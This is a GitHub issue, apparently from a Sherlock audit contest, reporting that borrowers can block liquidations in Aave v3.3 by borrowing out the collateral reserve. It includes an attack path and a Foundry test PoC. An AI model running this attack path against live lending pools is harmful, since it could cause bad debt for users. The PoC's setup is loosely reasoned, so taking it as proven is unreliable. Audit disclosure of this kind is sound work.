Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Mini Indigo Yak - Borrowers are able to DOS liquidations #205

Open
sherlock-admin3 opened this issue Jan 22, 2025 · 0 comments
Open

Mini Indigo Yak - Borrowers are able to DOS liquidations #205

sherlock-admin3 opened this issue Jan 22, 2025 · 0 comments

Comments

@sherlock-admin3
Copy link

Mini Indigo Yak

High

Borrowers are able to DOS liquidations

Summary

If user borrows X and places collateral Y then other user can borrow the whole collateral Y by placing collateral C. When liquidator comes to liquidate the initial user there won't be enough collateral Y and liquidation will revert.

https://github.com/sherlock-audit/2025-01-aave-v3-3/blob/main/aave-v3-origin/src/contracts/protocol/pool/Pool.sol#L223

Root Cause

Borrowers can borrow the whole collateral and makes liquidations revert because liquidators will not be able to receive the collateral of the borrower.

Internal Pre-conditions

No response

External Pre-conditions

No response

Attack Path

  1. User1: supply collateral 1000 ETH
  2. User1: borrow X
  3. User1 becomes liquidetable
  4. User2 borrows 1000 ETH and places Y as collateral
  5. Liquidator call will revert

Impact

Protocol can get bad debt by liquidations not happening on time.

PoC

Paste this test in Pool.liquidations.t.sol:

  function test_liquidate_when_there_isnt_enough_collateral() public {
    vm.startPrank(address(0x155));
    deal(tokenList.weth, address(0x155), 10_000e18);
    IERC20(tokenList.weth).approve(address(contracts.poolProxy), 10_000e18);

    contracts.poolProxy.supply(tokenList.weth, 10_000e18, address(0x155), 0);
    vm.stopPrank();

    uint256 amount = 2000e6;
    uint256 borrowAmount = 1620e6;
    vm.startPrank(alice);

    contracts.poolProxy.supply(tokenList.usdx, amount, alice, 0);

    contracts.poolProxy.borrow(tokenList.usdx, borrowAmount, 2, 0, alice);
    vm.stopPrank();

    vm.warp(block.timestamp + 20000 days);

    vm.prank(address(0x155));
    contracts.poolProxy.borrow(tokenList.usdx, 100_000e6, 2, 0, address(0x155));

    LiquidationInput memory params = _loadLiquidationInput(
      alice,
      tokenList.usdx,
      tokenList.usdx,
      UINT256_MAX,
      tokenList.wbtc,
      0
    );

    uint256 liquidatorBalanceBefore;
    if (params.receiveAToken) {
      (address atoken, , ) = contracts.protocolDataProvider.getReserveTokensAddresses(
        params.collateralAsset
      );
      liquidatorBalanceBefore = IERC20(atoken).balanceOf(bob);
    } else {
      liquidatorBalanceBefore = IERC20(params.collateralAsset).balanceOf(bob);
    }

    // vm.expectEmit(address(contracts.poolProxy));
    emit LiquidationLogic.LiquidationCall(
      params.collateralAsset,
      params.debtAsset,
      params.user,
      params.actualDebtToLiquidate,
      params.actualCollateralToLiquidate,
      bob,
      params.receiveAToken
    );

    // Liquidate
    vm.prank(bob);
    contracts.poolProxy.liquidationCall(
      params.collateralAsset,
      params.debtAsset,
      params.user,
      params.liquidationAmountInput,
      params.receiveAToken
    );
  }

Mitigation

Consider limiting the amounts users can borrow especially amounts that are used as collateral.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@sherlock-admin3